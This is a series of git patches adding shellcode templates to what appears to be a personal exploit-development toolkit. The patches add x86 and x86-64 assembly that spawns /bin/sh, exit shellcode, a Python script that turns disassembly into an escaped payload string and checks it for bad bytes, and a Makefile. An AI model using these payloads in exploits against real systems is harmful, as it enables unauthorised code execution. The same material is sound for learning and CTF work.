From e9cb4e14009a9ea3cbd08c2c4992d0e24b69e097 Mon Sep 17 00:00:00 2001
From: Malfurious <m@lfurio.us>
Date: Sun, 22 Aug 2021 05:52:56 -0400
Subject: Add generic /bin/sh shellcode templates

Signed-off-by: Malfurious <m@lfurio.us>
---
 templates/shellcode/shell32.asm | 14 ++++++++++++++
 templates/shellcode/shell64.asm | 15 +++++++++++++++
 2 files changed, 29 insertions(+)
 create mode 100644 templates/shellcode/shell32.asm
 create mode 100644 templates/shellcode/shell64.asm

(limited to 'templates/shellcode')

diff --git a/templates/shellcode/shell32.asm b/templates/shellcode/shell32.asm
new file mode 100644
index 0000000..d12910f
--- /dev/null
+++ b/templates/shellcode/shell32.asm
@@ -0,0 +1,14 @@
+[SECTION .text]
+global _start
+
+; https://www.exploit-db.com/shellcodes/46809
+
+_start:
+    xor     ecx, ecx
+    push    0xb
+    pop     eax
+    push    ecx
+    push    0x68732f2f
+    push    0x6e69622f
+    mov     ebx, esp
+    int     0x80
diff --git a/templates/shellcode/shell64.asm b/templates/shellcode/shell64.asm
new file mode 100644
index 0000000..a6d4626
--- /dev/null
+++ b/templates/shellcode/shell64.asm
@@ -0,0 +1,15 @@
+[SECTION .text]
+global _start
+
+; https://www.exploit-db.com/shellcodes/47008
+
+_start:
+    xor     rsi, rsi
+    push    rsi
+    mov     rdi, 0x68732f2f6e69622f
+    push    rdi
+    push    rsp
+    pop     rdi
+    mov      al, 0x3b
+    cdq
+    syscall
-- 
cgit v1.2.3


From 9a5f29e228846a2a7fda8497e72c94cad516376c Mon Sep 17 00:00:00 2001
From: Malfurious <m@lfurio.us>
Date: Sun, 22 Aug 2021 06:03:20 -0400
Subject: Add sys_exit shellcode templates

Signed-off-by: Malfurious <m@lfurio.us>
---
 templates/shellcode/exit32.asm | 8 ++++++++
 templates/shellcode/exit64.asm | 8 ++++++++
 2 files changed, 16 insertions(+)
 create mode 100644 templates/shellcode/exit32.asm
 create mode 100644 templates/shellcode/exit64.asm

(limited to 'templates/shellcode')

diff --git a/templates/shellcode/exit32.asm b/templates/shellcode/exit32.asm
new file mode 100644
index 0000000..559c89c
--- /dev/null
+++ b/templates/shellcode/exit32.asm
@@ -0,0 +1,8 @@
+[SECTION .text]
+global _start
+
+_start:
+    xor     ebx, ebx
+    xor     eax, eax
+    mov      al, 0x1
+    int     0x80
diff --git a/templates/shellcode/exit64.asm b/templates/shellcode/exit64.asm
new file mode 100644
index 0000000..fb899a2
--- /dev/null
+++ b/templates/shellcode/exit64.asm
@@ -0,0 +1,8 @@
+[SECTION .text]
+global _start
+
+_start:
+    xor     rdi, rdi
+    mov      al, 0x3c
+    cdq
+    syscall
-- 
cgit v1.2.3


From 89c13129a55ccbecda31614c83e88612972c11a6 Mon Sep 17 00:00:00 2001
From: Malfurious <m@lfurio.us>
Date: Sun, 22 Aug 2021 08:25:26 -0400
Subject: Refactor genhex into shelltool

For convenience, I've rewritten my old shellcode parser program in
Python.  It is moved to the shellcode templates dir and renamed to
shelltool.

As a new feature, shelltool will now check the result for NULL bytes and
newline bytes that may cause problems in an exploit.

Signed-off-by: Malfurious <m@lfurio.us>
---
 templates/shellcode/shelltool.py | 30 ++++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100755 templates/shellcode/shelltool.py

(limited to 'templates/shellcode')

diff --git a/templates/shellcode/shelltool.py b/templates/shellcode/shelltool.py
new file mode 100755
index 0000000..b95a8cd
--- /dev/null
+++ b/templates/shellcode/shelltool.py
@@ -0,0 +1,30 @@
+#!/usr/bin/env python
+
+# This script will convert shellcode disassembly into an escaped string literal
+# and warn about problematic bytes in the payload.
+#     objdump -d elf | ./shelltool.py
+
+import sys
+
+name = None
+bytecode = []
+badchars = [ 0x00, 0x0a ]
+
+for line in sys.stdin:
+    for tok in line.split():
+        if name is None:
+            name = tok
+        if len(tok) == 2:
+            try:
+                bytecode.append(int(tok, base=16))
+            except:
+                pass
+
+result = ''.join([ "\\x%02x"%(x) for x in bytecode ])
+result = f'{name}"{result}"'
+
+for x in badchars:
+    if x in bytecode:
+        result += f'    **0x{"%02x"%(x)} detected**'
+
+print(result)
-- 
cgit v1.2.3


From d0e68f51eae112447289f2bcf541c4a4882ec741 Mon Sep 17 00:00:00 2001
From: Malfurious <m@lfurio.us>
Date: Sun, 22 Aug 2021 09:24:04 -0400
Subject: Add Makefile for shellcode templates

The shell*.asm files are considered the default programs and the
expected use-case for utilizing the templates is to edit these files to
implement the desired shellcode.  I figure that literal shellcode makes
the most sense of what to expect by default.

'make all' will assemble and link the shellcode (so it can actually be
directly executed via the output elf files), and feed the disassembly
into shelltool for use elsewhere.

Signed-off-by: Malfurious <m@lfurio.us>
---
 templates/shellcode/Makefile | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)
 create mode 100644 templates/shellcode/Makefile

(limited to 'templates/shellcode')

diff --git a/templates/shellcode/Makefile b/templates/shellcode/Makefile
new file mode 100644
index 0000000..2e67adc
--- /dev/null
+++ b/templates/shellcode/Makefile
@@ -0,0 +1,17 @@
+.PHONY: all
+
+all: shell32.elf shell64.elf
+	@objdump -d shell32.elf | ./shelltool.py
+	@objdump -d shell64.elf | ./shelltool.py
+
+shell32.o: shell32.asm
+	nasm -f elf shell32.asm -o shell32.o
+
+shell32.elf: shell32.o
+	ld -melf_i386 shell32.o -o shell32.elf
+
+shell64.o: shell64.asm
+	nasm -f elf64 shell64.asm -o shell64.o
+
+shell64.elf: shell64.o
+	ld shell64.o -o shell64.elf
-- 
cgit v1.2.3